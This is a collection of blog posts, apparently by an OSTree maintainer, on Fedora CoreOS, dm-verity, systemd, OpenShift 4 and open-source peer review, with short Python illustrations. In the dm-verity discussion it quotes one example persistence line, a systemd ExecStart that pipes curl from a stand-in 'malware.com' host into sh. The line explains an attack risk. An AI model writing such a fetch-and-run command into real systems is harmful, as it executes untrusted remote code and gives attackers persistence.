Further, while we continue to debate the role of package layering (rpm-ostree install) in Fedora CoreOS, one way to look at this is recasting RPMs as “operating system extensions”, much like Firefox extensions. If you want to rpm-ostree install fish (or e.g. PAM modules), you can do so.

Extending the OS (and replacing parts for testing/development) are first class operations and will remain so; doing so works in a similar way to traditional package systems. We aren’t requiring other shells or PAM modules to containerize somehow, as that would be at odds with keeping the experience first class and avoiding “two ways to do it”.

Finally, the coreos-assembler project makes it easy to do fully custom builds. Our focus of course is on providing a pre-built system that’s useful to users, but our build process is pretty easy to replicate and will remain so.

Not tied in with proprietary cloud infrastructure

Another thing that needs to be stated here is we will continue to make an operating system that is not tied into proprietary cloud infrastructure. Currently in this area besides update rollout infrastructure we ship a counting service – the backing service is fully open, and it’s easy to turn off. In contrast of course, ChromeOS for example comes set up such that the operating system accounts are the same as Google cloud accounts.

Adding opt-in security

All of the above said, there are a lot of powerful benefits from the “locked down” operating system. I’ve been thinking recently about how we can enable this type of thing while “staying true to our roots”.

One thing that’s probably an ingredient of this is the fs-verity work which is also being driven by the ChromeOS/Android use case. They are hitting issues with the inflexibility of dm-verity; per these slides – “Intractable complexity when dealing with the Android partner ecosystem”. We can see the manifestation of this looking at the new Android APEX files – basically, there’s a need for 3rd parties to distribute privileged code. Currently APEX files are loopback-mounted ext4 images with dm-verity, which is quite ugly.

fs-verity would mesh much more nicely with OSTree (which has always operated purely at the filesystem level) and other tools. (Update: Since I drafted this blog post a while ago I did get around to experimenting with fs-verity).

I haven’t yet gotten around to writing a fedora-coreos-tracker issue for this – but I think a proposal would be something like built-in functionality that allows you to opt in to a model where, after the OS has booted and Ignition has run, no further privileged code could execute unless it is signed by a keychain including the OS vendor’s key or your keys. We’d ensure that the configuration in /etc was also part of a verified chain, since even if /usr is signed and verity protected, malware could otherwise persist in a systemd unit in /etc. Some people would probably want an “emergency ssh” shell that bypassed this; others would not (perhaps the default would be that anyone who didn’t want “emergency ssh” could simply disable the sshd.service unit). And note that we’d have to either have e.g. .bashrc included in the signature chain, or more likely ignored by default.

For Silverblue, one thing I’ve been thinking about is ensuring that the user flow works well without sudo by default. If you want to become root, you need to type Ctrl-Alt-Del (like Windows NT) and that switches you to a separate VT. The reason is that compromise of the user account with sudo privileges is really the same as a root compromise. You can’t trust your terminal emulators or display (aside: QubesOS approaches this by running everything in VMs with labeled borders and avoiding doing much on the host at all by default). We need to have a default “safe key” exactly like the single button on an iPhone always takes you to the home screen – allows you to make changes, and applications can’t intercept or control that key.

To reiterate, we need to more strongly separate the privileged OS content from your applications (containers/Flatpaks) and development tools by default. But at the same time we should continue allowing the operating system to truly be owned by you should you so choose. It’s your hardware.

Most important: apply security updates by default

As alluded to above: I think one of the most important things we can do for security is simply getting to a world where security updates (especially for the operating system/root filesystem) are applied automatically by default. That is of course the bold move that Container Linux did, and we will be preserving that with Fedora CoreOS.

This blog is focused on the base OS, but when applications are containerized it also is usually much easier to keep them updated too.

Doing automatic updates like that is much more tenable if it’s decoupled from core applications, and also if it’s fully transactional/safe as rpm-ostree enables.
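To make “transactional” a bit more concrete, here is a minimal Python sketch of one generic building block: switching between two complete on-disk trees by atomically replacing a symlink. This is an illustration of the general technique only, not rpm-ostree’s actual implementation; the function name atomic_switch and the deploy-a/deploy-b directory names mentioned below are made up for the example.

```python
import os


def atomic_switch(link_path, new_target):
    """Point the symlink at link_path to new_target in one atomic step.

    The new symlink is created under a temporary name and then renamed
    over the old one. On POSIX systems rename() replaces the destination
    atomically, so a reader sees either the old target or the new one,
    never a half-updated state.
    """
    directory = os.path.dirname(os.path.abspath(link_path))
    tmp = os.path.join(directory, ".tmp-" + os.path.basename(link_path))
    if os.path.lexists(tmp):
        os.unlink(tmp)  # clean up after an earlier interrupted attempt
    os.symlink(new_target, tmp)
    os.replace(tmp, link_path)  # renames the symlink itself, not its target
```

With two prepared trees deploy-a and deploy-b next to a symlink named current, an update is atomic_switch("current", "deploy-b") and a rollback is the same call with "deploy-a". The old tree is never modified in place, which is what makes unattended updates much less scary.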

We’ve already released OpenShift 4 which is strongly container oriented and contains an opinionated and streamlined way to update the OS together with the cluster, and includes transactional updates for the OS. There’s also an enhancement for automatic updates in progress. Fedora CoreOS work is progressing too – I’m excited to see where we take all of this in 2020!

systemd is really well designed

One of the things I think has generally worked well about “Linux” and the ecosystem on top of it has been the variety of userspace.  There’s obviously some pointless things, but also some genuine innovation.  It works well when upstream projects are structured in a way that they can be mixed and matched.

For Fedora CoreOS we are combining two technologies: Ignition and rpm-ostree.  Previously they were used independently: Ignition with a ChromeOS-style A/B updater, and rpm-ostree with the traditional Fedora-and-derivatives setup of Kickstart for bare metal and cloud-init for clouds.

Putting the two together has been working well so far, but I’ve recently been working on support for root filesystem reprovisioning which is where the two projects intersect strongly.  This has meant a lot of time writing code in the initramfs.

And the topic of this blog is “systemd is well designed” because the design for systemd in the initramfs is very flexible and also well documented.  We’re continuing to support Ignition independent of OSTree, as well as OSTree independent of Ignition, while also having both of them work together.  Further, the projects are written in different languages; Ignition is Go, OSTree is C, we have the usual (unfortunate) mix of shell script in there, and it’s likely we’ll add some Rust soon too.

This is where systemd excels; we can plug these things together in a coordinated fashion by writing unit files with careful dependencies.  They can communicate however they want; in practice, writing files in /run is a common pattern.
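As a rough illustration of what “careful dependencies” buys you, the Python sketch below models ordering constraints of the kind After= expresses and derives a valid start order from them. The unit names are hypothetical (they are not the real Ignition or OSTree units), and real systemd does far more than a topological sort; this only shows the ordering idea.

```python
from graphlib import TopologicalSorter  # Python 3.9+

# Hypothetical initramfs units. Each key maps to the set of units it must
# be ordered after, i.e. what an "After=" line would list.
AFTER = {
    "example-fetch-config.service": set(),
    "example-partition-root.service": {"example-fetch-config.service"},
    "example-mount-sysroot.service": {"example-partition-root.service"},
    "example-write-files.service": {
        "example-fetch-config.service",
        "example-mount-sysroot.service",
    },
}


def start_order(after):
    """Return one start order that satisfies every ordering constraint.

    Raises graphlib.CycleError if the constraints contradict each other.
    """
    return list(TopologicalSorter(after).static_order())


if __name__ == "__main__":
    for unit in start_order(AFTER):
        print(unit)
```

Each project only declares what it needs to run after; neither has to know how the other is implemented or what language it is written in.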

Also worth noting is that we’re using dracut, which is itself independent of systemd but here just implements the systemd boot sequence – our units plug into the “custom initrd services” section.  And it all Just Worked.  The systemd initramfs boot sequence (and the boot sequence in general) was designed long before either OSTree or Ignition was created, but it’s stood the test of time.

OpenShift 4: Streamlining RHEL as Kubernetes-native OS

Been a while since I’ve blogged here, going to try to do so more often!  For quite a while now in the CoreOS group at Red Hat I’ve been part of a team working to create RHEL CoreOS, the cluster-managed operating system that forms a base of the just-released OpenShift 4.

With OpenShift 4 and RHEL CoreOS, we have created a project called machine-config-operator – but I like to think of it as the “RHEL CoreOS operator”.  This is a fusion of technologies that came from the CoreOS acquisition (Container Linux, Tectonic) along with parts of RHEL Atomic Host, but with a lot of brand new code as well.

What the MCO (machine-config-operator) does is pair with RHEL CoreOS to manage operating system updates as well as configuration in a way that makes the OS feel like a Kubernetes component.

This is a radically different approach than the OpenShift 3.x days, where the mental model was to provision + configure the OS (and container runtime), then provision a cluster on top.   With OpenShift 4 using RHCOS and the MCO, the cluster controls the OS.

If you haven’t yet, I encourage you to dive right in and play around with some of the example commands from the docs as well as examples from the upstream repository.  There is also my Devconf.cz 2019 talk (slightly dated now).

The release of 4.1 of course is just a beginning – there’s a whole lot more to do to bridge the worlds of the “traditional” operating system and Kubernetes/OpenShift.  For example, in git master of the MCO (for the next release after 4.1) we landed support for kernel arguments.  I think it’s quite cool to be able to e.g. oc edit machineconfig/50-nosmt, change the KernelArguments field in the MachineConfig CRD, add e.g. nosmt (or any other karg) and watch that change incrementally roll out across the cluster, reconciling the OS state just like any other Kubernetes object.
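For readers who want to see roughly what such an object looks like, here is a small Python sketch that builds a MachineConfig carrying a kernel argument and prints it as JSON. The apiVersion, role label and kernelArguments field name reflect my understanding of the MCO API and should be checked against the docs for your release; the helper function name is made up for this example.

```python
import json


def kernel_args_machineconfig(name, role, kargs):
    """Build a MachineConfig-shaped dict that adds kernel arguments.

    Assumption: field names follow the machineconfiguration.openshift.io/v1
    API as I understand it; verify against your cluster before relying on it.
    """
    return {
        "apiVersion": "machineconfiguration.openshift.io/v1",
        "kind": "MachineConfig",
        "metadata": {
            "name": name,
            # The role label selects which machine pool picks this up.
            "labels": {"machineconfiguration.openshift.io/role": role},
        },
        "spec": {"kernelArguments": list(kargs)},
    }


if __name__ == "__main__":
    mc = kernel_args_machineconfig("50-nosmt", "worker", ["nosmt"])
    print(json.dumps(mc, indent=2))
```

The point is that the kernel command line becomes just another declarative field that the cluster reconciles, rather than something edited by hand on each node.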

The links above have lots more detail for those interested in learning more – I’ll just link again operating system updates as I think that one is particularly interesting.

This release of OpenShift 4.1 is laying a powerful new foundation for things to come, and I’m really proud of what the teams have accomplished!

 

On dm-verity and operating systems

TL;DR: I posit that dm-verity is most useful if one is making a true fixed purpose device that has extremely limited configuration. If one allows installing (unprivileged) software, the protection is weaker. And if it’s an intentional design feature of the OS to allow persistently installing privileged software, the value of dm-verity plummets significantly.

I am one of the upstream maintainers of the ostree project which is comparable with projects that do A/B style partition updates for operating systems, although it’s implemented at the filesystem and not the block level. There’s a bit more on related projects here.

We got a request to investigate dm-verity, and I wrote down some preliminary thoughts. However, since then I spent a while thinking about it, and the benefits/drawbacks of dm-verity.

As I mention in the TL;DR section, I’m going to claim that dm-verity is best when the machine/device has limited configuration (config files should not be arbitrary code) and no ability to install software. For example, take a “WiFi camera”. These types of devices are obviously in the news for security issues.

What can dm-verity do for appliance-type systems?

Let’s say the device’s web interface has a flaw that allows an attacker on the local network to gain code execution; for example, command injection. However, the device manufacturer has properly implemented dm-verity, and every persistent mount point is read-only and verity protected. This is a significant barrier to the attacker maintaining persistence across a reboot. Concretely, one could unplug the camera, plug it into a secure network, allow it to download an OS update fixing the vulnerability, and have some confidence the exploit hasn’t persisted.
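The reason tampering is detectable is that a single trusted root hash covers every block of the image. The Python sketch below shows that idea with a simple binary hash tree. It is deliberately simplified and is not dm-verity’s real on-disk format (which, among other things, packs many hashes per hash block, uses a salt, and verifies blocks lazily as they are read); the function names and the 4096-byte block size are choices made for this example.

```python
import hashlib

BLOCK_SIZE = 4096  # illustrative block size


def _digest(data):
    return hashlib.sha256(data).digest()


def root_hash(image, block_size=BLOCK_SIZE):
    """Compute a Merkle-style root hash over fixed-size blocks of image."""
    blocks = [image[i:i + block_size] for i in range(0, len(image), block_size)]
    level = [_digest(b) for b in blocks] or [_digest(b"")]
    while len(level) > 1:
        if len(level) % 2:
            level.append(level[-1])  # duplicate the last hash on odd levels
        level = [_digest(level[i] + level[i + 1]) for i in range(0, len(level), 2)]
    return level[0]


def verify(image, trusted_root, block_size=BLOCK_SIZE):
    """Return True only if image still matches the trusted root hash."""
    return root_hash(image, block_size) == trusted_root
```

If the trusted root hash is itself covered by a signature checked early in boot, an attacker who flips even one byte of the image changes the root hash, and verification fails on the next boot.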

However, even that said, there are limits to the value here. dm-verity does not help you with the attacker monitoring the camera and spying on you; for example if it has a view of one of your offices, it could be recording your typed passwords. Attackers could use it to launch attacks on other devices on the network until it’s been rebooted. This article gives an example of nation-state level malware that lived “in the network”, not persistently on disk; in order to remove it the organization had to reboot everything at the same time.

Dm-verity on non-appliance systems

The ChromeOS trusted boot design docs have a section titled “Known weaknesses of verified boot”:

While verified boot can ensure that the system image (i.e. firmware, kernel, root file system) are protected against tampering by attackers, it can’t protect data that must inherently be modifiable by a running system. This includes user data, but also system-wide state such as system configuration (network, time zone, keyboard layout, etc.)…

One very interesting thing here is the fundamental difference between the original ChromeOS design (a device to just run Chrome i.e. web pages, no 3rd party non-browser software at all) and Android, which is obviously all about “apps”. Modern Android does use dm-verity; as I understand it the ChromeOS and Android projects are trying to merge some technologies, which includes the OS update mechanism.

On Android, apps are “unprivileged” or non root software, without Linux capabilities. But from a user perspective of course, applications can do quite a lot; similar to the WiFi camera case, attackers are likely perfectly happy injecting “unprivileged” Android applications that can monitor your location, microphone etc. Besides the well-known issues with Android devices not receiving security updates, there is a good example of a privilege escalation issue in Android called Cloak And Dagger; applications can exploit the accessibility framework to escalate their privileges, including full keystroke recording.

That said, persisting in an application does increase the chance an attacker could be detected. And if one suspects an Android device is compromised, dm-verity does provide value in that one can do a factory reset, and a bit like the WiFi camera scenario, do an OS update (before reinstalling apps), and have some confidence that the malware hasn’t persisted.

Dm-verity on full general purpose systems

A fully general purpose operating system needs to allow the installation of privileged code as well. An example of an OS that uses dm-verity and allows 3rd party code to execute with full (i.e. Linux CAP_SYS_ADMIN) privileges is CoreOS (yes, I know they renamed it to “Container Linux” but sorry, I think that’s silly, I’m going to keep calling it “CoreOS” 😃 ).

Installing a tool like Kubernetes on top of CoreOS requires it to be fully privileged to do its job (specifically the kubelet). Having a mechanism to install privileged software persistently means that same mechanism can be used by malware. While it’s true the malware doesn’t need to live in the /usr directory, unlike the non-configurable camera scenario, a software update and reboot isn’t going to fix things.

Also on CoreOS, attackers can write fully privileged unit files in /etc/systemd/system/, or do the classic Unix thing of writing to /root/.bashrc. These are all places where malware can persist across reboots. dm-verity in theory does make detection easier – but most system administrators are going to find it easier to simply re-provision their systems, and not look carefully at all of the files in /etc.

Ostree-style flexibility vs fixed block devices

Now let’s examine what an ostree-based system like Fedora Atomic Host does to help prevent these types of hacks. Unfortunately, the answer is nothing! Atomic Host systems are equally general purpose. Since you can e.g. configure the system to set an HTTP proxy, an attacker could likewise create a systemd unit file that runs ExecStart=/bin/sh -c 'curl http://malware.com/ | sh'. Further, the OS data in /sysroot/ostree/repo isn’t verity protected; it’s just data in a filesystem, just like RPMs/debs etc. And for that matter, just like Docker overlay2 container files.

Why not implement dm-verity anyways? The answer is that I think it’s more valuable to have 3rd party software installation more tightly integrated with the host. We’re working on system containers for Kubernetes for example – these system containers have part of their configuration on the host, and configuration files down the line are going to be tracked by RPM. And outside of the container space, rpm-ostree supports “package layering”, which brings the best features of image update systems with the flexibility of package systems. You can use package layering to install privileged software like PAM modules, kernel drivers and the like. We recently landed the first experimental support for live system updates. This would be technically much harder if we operated at the block level, which dm-verity would force us into. Not to mention deep questions around signing of the bootable hash.

Package layering is crucial to provide flexibility for “small scale” or “pet” machines. rpm-ostree allows you to use yum/apt/zypper style workflows and still get the benefits of image-like approaches, such as a known-good “base image”, transactional updates and “offline” updates. For example, with rpm-ostree you can uninstall your layered packages, and this will return the system exactly to the “base image” in /usr.

Some people I’ve talked to about package layering don’t like the idea of still doing package installs per-machine. This is often the “large scale identical machine” cases – racks of identical servers (or at least ones that can use the same OS image), and “corporate standard build” laptops. In the large scale server case, organizations would prefer doing a “custom compose”, baking in their configuration to the images.

This goes back to a potential dm-verity scenario; in this model, we’d really want /etc to be immutable at runtime. Traditional files that need to be modified at runtime under /etc like /etc/resolv.conf would be a symlink into /run. Other “persistence vectors” like /usr/local and /root would need to be verity-protected too. The only writable, persistent filesystem should be /var. We’d also need to audit the operating system to make sure that no code can live in /var. A quick inspection shows there’d be work to do here; for example, I suspect /var/cache/ldconfig/aux-cache is used by the dynamic linker. There’s also /var/lib/alternatives. Hm, I notice my workstation has /var/spool/at – a cron job would be an excellent persistence vector too.
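A first pass at that kind of audit could be automated. The Python sketch below walks a directory tree and reports regular files that look like code: anything with an execute bit, an ELF header, or a “#!” line. The function name and the heuristics are my own for this example, and it would be only a starting point, since it cannot spot data files that privileged programs later interpret (a linker cache or a spooled at job, for instance).

```python
import os
import stat


def find_code_like_files(root):
    """Return sorted paths under root that look like executable code.

    Heuristics (illustrative only): execute permission bits, an ELF magic
    number, or a shebang at the start of the file.
    """
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # vanished or unreadable; skip it
            if not stat.S_ISREG(st.st_mode):
                continue  # ignore symlinks, sockets, devices, etc.
            if st.st_mode & 0o111:
                hits.append(path)
                continue
            try:
                with open(path, "rb") as f:
                    magic = f.read(4)
            except OSError:
                continue
            if magic == b"\x7fELF" or magic[:2] == b"#!":
                hits.append(path)
    return sorted(hits)


if __name__ == "__main__":
    for path in find_code_like_files("/var"):
        print(path)
```

Anything this reports under /var would need to move elsewhere, or be explicitly justified, before /var could be treated as a data-only area.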

This sounds relatively doable. Get rid of things like at (Fedora Atomic Host already doesn’t have either the legacy cron or at – we suggest people use systemd timers). Move that type of configuration underneath either /etc or /usr, which is what the “systemd config model” does; those directories are read-only at runtime.

But going back to the high level – for general purpose operating systems, I’d take the flexibility of rpm-ostree’s dynamic package layering over having dm-verity for just a subset of privileged code. Being able to seamlessly install utilities on the host is very useful. We’ve even landed some recent work on replacing parts of the “base image”. I don’t want to build a new OS image every time I want to test a new version of docker or systemd, at least in a dev/test cycle.

I think there’s a spectrum here – with the “ostree model” enforcing read-only constraints around /usr, we are supporting iteration towards the more locked down “verity appliance” style devices. I know there are both ostree (and rpm-ostree) users today who are willing to drop some of the flexibility for increased security. If you’re one of those, please do follow the upstream issues linked above!

Concretely, you could build a tool that takes a kickstart configuration (your requested partitioning, time zone, etc.) plus generic %post style configuration (extra PAM tweaks, Docker registries), plus layered packages, plus container images, (and container runtime configuration?) and put all of that into a disk image, signed with dm-verity.

A challenge here is a lot of organizations are going to want branching. If one wants to update to a new version of Kubernetes/OpenShift, that would require a new image build. Organizations are going to want multiple active versions, to try out new OS builds in staging. Changing any configuration file that lives in /etc would also be a new image build. There are clearly files in /etc where a “heavyweight” change process could make sense; for example, the CA trust roots in /etc/pki.

Back to my original thesis, the dm-verity approach is best for IoT/appliance devices with truly limited configuration. As soon as you have any persistent place to write configuration/code that isn’t verity protected, its value drops.

Peer review, FOSS, and packaging/containers etc

Lately whenever I give a presentation, I often at least briefly mention one of my primary motivations for doing what I do:  I really like working in a global community of people on Free Software.

A concrete artifact of that work is the code landing in git repositories.  But I believe it’s not just about landing code – peer review is a fundamental ingredient.

Many projects of course start out as just one person scratching an itch or having fun.  And it’s completely fine for many to stay that way.  But once a project reaches a certain level of maturity and widespread usage, I think it’s generally best for the original author to “step down” and become a peer.  That’s what I’ve now done for the OSTree project.

In other words, landing code in git master for a mature project should require at least one other person to look at it.  This may sound obvious, but you’d be surprised…there are some very critical projects that don’t have much in the way of peer review.

To call out probably the most egregious example, the bash shell.  I’m deliberately linking to their “git log” because it violates all modern standards for git commit messages.  Now,  I don’t want to overly fault Chet for the years and years he’s put into maintaining the Bash project on his own time.  His contribution to Free Software is great and deserves recognition and applause.  But I believe that getting code into bash should involve more than just him replying to a mail message and running git push.  Bash isn’t the only example of this in what I would call the “Linux distribution core”.

Another major area where there are gaps is the “language ecosystems” like Node.js, Rust’s cargo, Python’s pip etc.  Many projects on there are “one person scratching an itch” that other people mostly just consume.

There’s no magical solution to this – but in e.g. the language ecosystem case, if you happen to maintain a library which depends on another one, maybe consider spending a bit of your time looking at open pull requests and jumping in with review?

A vast topic related to this is “who is qualified to review” and “how intensively do I review”, but I think some qualified people are too timid about this – basically it’s much better to have a lightweight, even shallow, process than none at all.

Now finally, I included “packaging” in the title of this blog, so how does that relate?  It’s pretty simple, I also claim that most people doing what is today known as “packaging” should sign up to participate in upstream peer review.  Things like build fixes should go upstream rather than being kept downstream.  And if upstream doesn’t have peer review, reconsider packaging it – or help ensure peer review happens upstream!

 

 

Github, accounts, and ease of contribution

At the moment we’re making plans to move OSTree to Github (from GNOME), and while there are a few reasons for this, one thing I want to talk about is the “account problem” and specifically how it relates to free and open source software.

The “account problem” is simply that requiring users to create accounts is a barrier to contribution.   It’s problematic to require people to have a Sourceforge account, a GNOME account, a Github account, an Apache Bugzilla account, a Fedora/CentOS account, etc.  People who are committed to making a larger contribution can obviously easily overcome this, but for smaller contributions it hurts.

Particularly for projects like GNOME that have distinct accounts for bugzilla and commit.  Having to create an account just to file a bug is bad.  Yes, there’s OpenID, but still.

I’ll note at this point that software freedom is quite important to me, and the fact that Github is proprietary software is a problem.  But – making it easy for people to contribute to Free Software is also a major benefit.

I wonder how things would have turned out if Sourceforge had been…well, let’s say “less crappy”.  Anyways, now we have Github.

And when we move OSTree, I’d like to avoid becoming too dependent on it.  Particularly for things that aren’t actually git, like the issue tracker. Hopefully if GNOME doesn’t disagree, we’ll maintain our mailing list and bugzilla there so that people who prefer that can use it.

But allowing people to create Github PRs easily is really critical in my mind.  (On this topic, we are also planning to use the Homu bot, which I really like)

 

Thoughts on unikernels/rump kernels

I spend most of my time working on Project Atomic to further Linux containers deriving from a traditional upstream Linux distribution model, but the space of software delivery/runtime mechanisms is vast, and in particular, I have thought Unikernels were an interesting development.   While I do like writing C, the thought of an OS/library in a high level language is an interesting one (particularly interesting to me for a long time is how garbage collection could be better if integrated with the OS).

That was before Docker, Inc. acquired a unikernel company – now, I’m certainly curious where they’re going to go with it.

My thoughts before this were that the Unikernel model might make sense in the scenario where you have a “large” application and your sole deployment target is required to be virtualized (e.g. AWS, GCE, etc.).

In this case, it’s not really possible to share anything between virtual machines directly (modulo KSM and similar ad-hoc techniques which cost CPU and aren’t always predictable) – and so because you can’t share anything between these apps, it could gain you efficiency to dump the parts of the OS and userspace that you aren’t using in that VM, which could be a lot.

But, if you have any smaller microservice applications, it seems to me that having a shared kernel and userspace (as we provide with the Project Atomic and OpenShift 3 models) is going to be a lot more efficient than doing a VM-per-microservice, even if your VMs are unikernels.

And even with the “large app only for virt” scenario, what about debugging?  Ah yes, I just found a blog from Bryan Cantrill on this topic, and I have to say I agree.

Still though, there’s lots of middle ground here.  We can do far better at helping application authors to produce smaller apps (and host images) than we are with Docker normally right now, for example.